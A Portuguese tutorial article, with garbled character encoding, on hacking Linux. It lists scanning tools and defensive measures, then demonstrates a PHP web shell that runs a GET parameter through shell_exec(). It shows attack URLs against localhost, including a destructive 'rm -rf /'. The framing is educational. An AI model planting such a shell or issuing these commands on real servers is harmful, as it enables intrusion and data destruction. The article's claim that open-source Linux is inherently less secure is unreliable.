Hackeando o sistema operacional Linux: hackeando com Ubuntu (Tutorial de comandos)

Linux รฉ o sistema operacional de servidor mais utilizado, especialmente para servidores web. ร‰ de cรณdigo aberto; isso significa que qualquer pessoa pode ter acesso ao cรณdigo-fonte. Isso o torna menos seguro em comparaรงรฃo com outros sistemas operacionais, pois os invasores podem estudar o cรณdigo-fonte para encontrar vulnerabilidades.. Linux for Hackers trata de explorar essas vulnerabilidades para obter acesso nรฃo autorizado a um sistema.

Neste artigo, apresentaremos o que รฉ o Linux, suas vulnerabilidades de seguranรงa, hackear com Ubuntu e as contra-medidas que vocรช pode implementar.

Nota rรกpida sobre Linux

Linux รฉ um sistema operacional de cรณdigo aberto. Existem muitas distribuiรงรตes de sistemas operacionais baseados em Linux, como Redhat, Fedora e Ubuntu, etc. Ao contrรกrio de outros sistemas operacionais, o Linux รฉ menos seguro quando se trata de seguranรงa. Isso ocorre porque o cรณdigo-fonte estรก disponรญvel gratuitamente, entรฃo รฉ fรกcil estudรก-lo em busca de vulnerabilidades e explorรก-las em comparaรงรฃo a outros sistemas operacionais que nรฃo sรฃo de cรณdigo aberto. O Linux pode ser usado como um sistema operacional de servidor, desktop, tablet ou dispositivo mรณvel.

Os programas Linux podem ser operados usando GUI ou comandos. Os comandos do Linux para Kali Linux hackear sรฃo mais eficazes e eficientes em comparaรงรฃo ao uso da GUI. Por esse motivo, รฉ รบtil conhecer os comandos bรกsicos do Linux para hackear.

Consulte estes tutoriais https://www.guru99.com/unix-linux-tutorial.html sobre como comeรงar Kali Linux hacks.

Ferramentas de hackers para Linux

  • Nessusโ€“ esta ferramenta pode ser usada para Ubuntu hackear, verificar configuraรงรตes, patches e redes, etc., pode ser encontrado em https://www.tenable.com/products/nessus
  • NMapa. Esta ferramenta pode ser usada para monitorar hosts em execuรงรฃo no servidor e os serviรงos que eles utilizam. Tambรฉm pode ser usado para procurar portas. Ele pode ser encontrado em https://nmap.org/
  • SARA โ€“ SARA รฉ a sigla para Assistente de Pesquisa do Auditor de Seguranรงa. Como o nome indica, esta ferramenta pode ser usada para auditar redes contra ameaรงas como Injeรงรฃo de SQL, XSS etc. pode ser encontrado em http://www-arc.com/sara/sara.html

A lista acima nรฃo รฉ exaustiva; dรก uma ideia das ferramentas disponรญveis para Ubuntu hackear e hackear sistemas Linux.

Como evitar hacks no Linux

Linux Hacking aproveita as vulnerabilidades do sistema operacional. Uma organizaรงรฃo pode adotar a seguinte polรญtica para se proteger contra tais ataques.

  • Gerenciamento de patchesโ€“ patches corrigem bugs que os invasores exploram para comprometer um sistema. Uma boa polรญtica de gerenciamento de patches garantirรก que vocรช aplique constantemente patches relevantes ao seu sistema.
  • Configuraรงรฃo adequada do sistema operacionalโ€“ outras exploraรงรตes aproveitam os pontos fracos na configuraรงรฃo do servidor. Nomes de usuรกrios e daemons inativos devem ser desabilitados. As configuraรงรตes padrรฃo, como senhas comuns para aplicativos, nomes de usuรกrio padrรฃo e alguns nรบmeros de porta, devem ser alteradas.
  • Intrusion Detection Systemโ€“ tais ferramentas podem ser usadas para detectar acesso nรฃo autorizado ao sistema. Algumas ferramentas tรชm a capacidade de detectar e prevenir tais ataques.

Atividade de hacking: hackear um Ubuntu Sistema Linux usando PHP

Neste cenรกrio prรกtico, aprenderemos como hackear com Ubuntu e forneceremos informaรงรตes bรกsicas sobre como vocรช pode usar PHP comprometer um Linux. Nรฃo vamos atingir nenhuma vรญtima. Se quiser experimentar, vocรช pode instalar o LAMPP em sua mรกquina local.

PHP vem com duas funรงรตes que podem ser usadas para executar comandos de hacking do Linux. Possui funรงรตes exec() e shell_exec(). A funรงรฃo exec() retorna a รบltima linha da saรญda do comando enquanto shell_exec() retorna todo o resultado do comando como uma string.

Para fins de demonstraรงรฃo, vamos supor que os gerentes do invasor carreguem o arquivo a seguir em um servidor web.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

AQUI,

O script acima obtรฉm o comando da variรกvel GET chamada cmd. O comando รฉ executado usando shell_exec() e os resultados retornados no navegador.

O cรณdigo acima pode ser explorado usando o seguinte: URL

http://localhost/cp/konsole.php?cmd=ls%20-l

AQUI,

  • โ€œโ€ฆkonsole.php?cmd=ls%20-lโ€atribui o valor ls โ€“l ร  variรกvel cmd.

O comando em Ubuntu para hackear o servidor serรก executado como

shell_exec('ls -l') ;

A execuรงรฃo do cรณdigo acima em um servidor web fornece resultados semelhantes aos seguintes.

Hackear um Ubuntu Sistema Linux usando PHP

O comando acima simplesmente exibe os arquivos no diretรณrio atual e as permissรตes

Suponhamos que o invasor passe o seguinte comando

rm -rf /

AQUI,

  • โ€œrmโ€ remove os arquivos
  • โ€œrfโ€ faz o comando rm ser executado em modo recursivo. Excluindo todas as pastas e arquivos
  • โ€œ/โ€ instrui o comando para comeรงar a excluir arquivos do diretรณrio raiz

O ataque URL ficaria mais ou menos assim

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Resumo

  • Linux รฉ um sistema operacional popular para servidores, desktops, tablets e dispositivos mรณveis.
  • Linux รฉ de cรณdigo aberto e o cรณdigo-fonte pode ser obtido por qualquer pessoa. Isso torna mais fรกcil detectar as vulnerabilidades. ร‰ um dos melhores sistemas operacionais para hackers.
  • Comandos bรกsicos e de hacking de rede em Ubuntu sรฃo valiosos para hackers Linux.
  • Vulnerabilidades sรฃo pontos fracos que podem ser explorados para comprometer um sistema.
  • Uma boa seguranรงa pode ajudar a proteger um sistema contra comprometimento de um invasor.

Resuma esta postagem com: